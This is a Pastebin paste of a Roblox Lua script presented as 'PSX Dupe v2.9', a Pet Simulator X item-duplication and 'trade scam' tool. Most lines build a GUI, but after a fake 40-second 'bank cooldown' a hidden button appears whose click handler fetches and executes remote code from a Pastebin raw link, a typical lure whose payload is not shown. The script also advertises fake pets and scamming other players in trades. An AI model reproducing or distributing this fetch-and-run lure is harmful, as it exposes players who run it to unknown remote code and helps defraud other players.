Advertisement
sanvarix

tradescamm

Oct 24th, 2022
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.59 KB | None | 0 0
  1. -- This will only work on gems and exclusives that aren't Hippomelon or Party Cat.
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local Frame = Instance.new("Frame")
  5. local line = Instance.new("Frame")
  6. local TextLabel = Instance.new("TextLabel")
  7. local UICorner = Instance.new("UICorner")
  8. local TextLabel_2 = Instance.new("TextLabel")
  9. local timer = Instance.new("TextLabel")
  10. local TextLabel_3 = Instance.new("TextLabel")
  11. local tradescam = Instance.new("TextButton")
  12. local UICorner_2 = Instance.new("UICorner")
  13. local petnamebox = Instance.new("TextBox")
  14. local addfakepet = Instance.new("TextButton")
  15. local UICorner_3 = Instance.new("UICorner")
  16. local newdupe = Instance.new("TextButton")
  17. local UICorner_4 = Instance.new("UICorner")
  18. local petenchant = Instance.new("TextBox")
  19. local petenchant_2 = Instance.new("TextBox")
  20. local petnamebox_2 = Instance.new("TextBox")
  21. local olddupe = Instance.new("TextLabel")
  22.  
  23. ScreenGui.Parent = game.CoreGui
  24. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  25.  
  26. Frame.Parent = ScreenGui
  27. Frame.BackgroundColor3 = Color3.fromRGB(36, 170, 41)
  28. Frame.Position = UDim2.new(0.229676396, 0, 0.242350057, 0)
  29. Frame.Size = UDim2.new(0, 296, 0, 369)
  30. Frame.Active = true
  31. Frame.Draggable = true
  32.  
  33. line.Name = "line"
  34. line.Parent = Frame
  35. line.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  36. line.BorderSizePixel = 0
  37. line.Position = UDim2.new(0, 0, 0.138211384, 0)
  38. line.Size = UDim2.new(0, 296, 0, 4)
  39.  
  40. TextLabel.Parent = Frame
  41. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  42. TextLabel.BackgroundTransparency = 1.000
  43. TextLabel.BorderSizePixel = 0
  44. TextLabel.Size = UDim2.new(0, 296, 0, 29)
  45. TextLabel.Font = Enum.Font.FredokaOne
  46. TextLabel.Text = "PSX Dupe v2.9 - Makoeu#2967"
  47. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  48. TextLabel.TextScaled = true
  49. TextLabel.TextSize = 14.000
  50. TextLabel.TextWrapped = true
  51.  
  52. UICorner.CornerRadius = UDim.new(0, 16)
  53. UICorner.Parent = Frame
  54.  
  55. TextLabel_2.Parent = Frame
  56. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  57. TextLabel_2.BackgroundTransparency = 1.000
  58. TextLabel_2.BorderSizePixel = 0
  59. TextLabel_2.Position = UDim2.new(0.32432431, 0, 0.149051487, 0)
  60. TextLabel_2.Size = UDim2.new(0, 101, 0, 25)
  61. TextLabel_2.Font = Enum.Font.FredokaOne
  62. TextLabel_2.Text = "DUPE"
  63. TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  64. TextLabel_2.TextScaled = true
  65. TextLabel_2.TextSize = 14.000
  66. TextLabel_2.TextWrapped = true
  67.  
  68. timer.Name = "timer"
  69. timer.Parent = Frame
  70. timer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  71. timer.BackgroundTransparency = 1.000
  72. timer.BorderSizePixel = 0
  73. timer.Position = UDim2.new(0.0675675645, 0, 0.235772356, 0)
  74. timer.Size = UDim2.new(0, 251, 0, 40)
  75. timer.Font = Enum.Font.GothamBold
  76. timer.Text = "Waiting for bank cooldown... (30s)"
  77. timer.TextColor3 = Color3.fromRGB(0, 0, 0)
  78. timer.TextScaled = true
  79. timer.TextSize = 14.000
  80. timer.TextWrapped = true
  81.  
  82. TextLabel_3.Parent = Frame
  83. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  84. TextLabel_3.BackgroundTransparency = 1.000
  85. TextLabel_3.BorderSizePixel = 0
  86. TextLabel_3.Position = UDim2.new(0.131756753, 0, 0.365853667, 0)
  87. TextLabel_3.Size = UDim2.new(0, 232, 0, 25)
  88. TextLabel_3.Font = Enum.Font.FredokaOne
  89. TextLabel_3.Text = "TRADE-SCAM (soon)"
  90. TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
  91. TextLabel_3.TextScaled = true
  92. TextLabel_3.TextSize = 14.000
  93. TextLabel_3.TextWrapped = true
  94.  
  95. tradescam.Name = "tradescam"
  96. tradescam.Parent = Frame
  97. tradescam.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
  98. tradescam.Position = UDim2.new(0.0337837823, 0, 0.45799458, 0)
  99. tradescam.Size = UDim2.new(0, 278, 0, 29)
  100. tradescam.Font = Enum.Font.GothamBold
  101. tradescam.Text = "TRADE SCAM (REMOVE ALL)"
  102. tradescam.TextColor3 = Color3.fromRGB(0, 0, 0)
  103. tradescam.TextScaled = true
  104. tradescam.TextSize = 14.000
  105. tradescam.TextWrapped = true
  106.  
  107. UICorner_2.Parent = tradescam
  108.  
  109. petnamebox.Name = "petnamebox"
  110. petnamebox.Parent = Frame
  111. petnamebox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  112. petnamebox.Position = UDim2.new(0.192567572, 0, 0.552845538, 0)
  113. petnamebox.Size = UDim2.new(0, 102, 0, 26)
  114. petnamebox.Font = Enum.Font.GothamBlack
  115. petnamebox.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
  116. petnamebox.PlaceholderText = "Fake Pet Name"
  117. petnamebox.Text = ""
  118. petnamebox.TextColor3 = Color3.fromRGB(0, 0, 0)
  119. petnamebox.TextScaled = true
  120. petnamebox.TextSize = 14.000
  121. petnamebox.TextWrapped = true
  122.  
  123. addfakepet.Name = "addfakepet"
  124. addfakepet.Parent = Frame
  125. addfakepet.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
  126. addfakepet.Position = UDim2.new(0.560810804, 0, 0.547425449, 0)
  127. addfakepet.Size = UDim2.new(0, 122, 0, 29)
  128. addfakepet.Font = Enum.Font.GothamBold
  129. addfakepet.Text = "ADD FAKE PET"
  130. addfakepet.TextColor3 = Color3.fromRGB(0, 0, 0)
  131. addfakepet.TextScaled = true
  132. addfakepet.TextSize = 14.000
  133. addfakepet.TextWrapped = true
  134.  
  135. UICorner_3.Parent = addfakepet
  136.  
  137. newdupe.Name = "newdupe"
  138. newdupe.Parent = Frame
  139. newdupe.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
  140. newdupe.Position = UDim2.new(0.030405404, 0, 0.216802165, 0)
  141. newdupe.Size = UDim2.new(0, 278, 0, 25)
  142. newdupe.Visible = false
  143. newdupe.Font = Enum.Font.GothamBold
  144. newdupe.Text = "NEW DUPE (v2.9)"
  145. newdupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  146. newdupe.TextScaled = true
  147. newdupe.TextSize = 14.000
  148. newdupe.TextWrapped = true
  149. newdupe.MouseButton1Down:connect(function()
  150. loadstring(game:HttpGet('https://pastebin.com/raw/miK88c3K'))()
  151. end)
  152.  
  153. UICorner_4.Parent = newdupe
  154.  
  155. petenchant.Name = "petenchant"
  156. petenchant.Parent = Frame
  157. petenchant.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  158. petenchant.Position = UDim2.new(0.0337837823, 0, 0.642276406, 0)
  159. petenchant.Size = UDim2.new(0, 149, 0, 26)
  160. petenchant.Font = Enum.Font.GothamBlack
  161. petenchant.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
  162. petenchant.PlaceholderText = "Pet Enchant Name (eg. Strength)"
  163. petenchant.Text = ""
  164. petenchant.TextColor3 = Color3.fromRGB(0, 0, 0)
  165. petenchant.TextScaled = true
  166. petenchant.TextSize = 14.000
  167. petenchant.TextWrapped = true
  168.  
  169. petenchant_2.Name = "petenchant"
  170. petenchant_2.Parent = Frame
  171. petenchant_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  172. petenchant_2.Position = UDim2.new(0.560810804, 0, 0.642276406, 0)
  173. petenchant_2.Size = UDim2.new(0, 43, 0, 26)
  174. petenchant_2.Font = Enum.Font.GothamBlack
  175. petenchant_2.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
  176. petenchant_2.PlaceholderText = "V"
  177. petenchant_2.Text = ""
  178. petenchant_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  179. petenchant_2.TextScaled = true
  180. petenchant_2.TextSize = 14.000
  181. petenchant_2.TextWrapped = true
  182.  
  183. petnamebox_2.Name = "petnamebox"
  184. petnamebox_2.Parent = Frame
  185. petnamebox_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  186. petnamebox_2.Position = UDim2.new(0.0337837823, 0, 0.555555582, 0)
  187. petnamebox_2.Size = UDim2.new(0, 41, 0, 26)
  188. petnamebox_2.Font = Enum.Font.GothamBlack
  189. petnamebox_2.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
  190. petnamebox_2.PlaceholderText = "Tier (eg. Rainbow)"
  191. petnamebox_2.Text = ""
  192. petnamebox_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  193. petnamebox_2.TextScaled = true
  194. petnamebox_2.TextSize = 14.000
  195. petnamebox_2.TextWrapped = true
  196.  
  197. olddupe.Name = "olddupe"
  198. olddupe.Parent = Frame
  199. olddupe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  200. olddupe.BackgroundTransparency = 1.000
  201. olddupe.BorderSizePixel = 0
  202. olddupe.Position = UDim2.new(0.0675675645, 0, 0.273712724, 0)
  203. olddupe.Size = UDim2.new(0, 251, 0, 26)
  204. olddupe.Visible = false
  205. olddupe.Font = Enum.Font.GothamBold
  206. olddupe.Text = "Old dupe has been patched."
  207. olddupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  208. olddupe.TextScaled = true
  209. olddupe.TextSize = 14.000
  210. olddupe.TextWrapped = true
  211.  
  212. wait(40)
  213.  
  214. timer.Visible = false
  215. newdupe.Visible = true
  216. olddupe.Visible = true
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement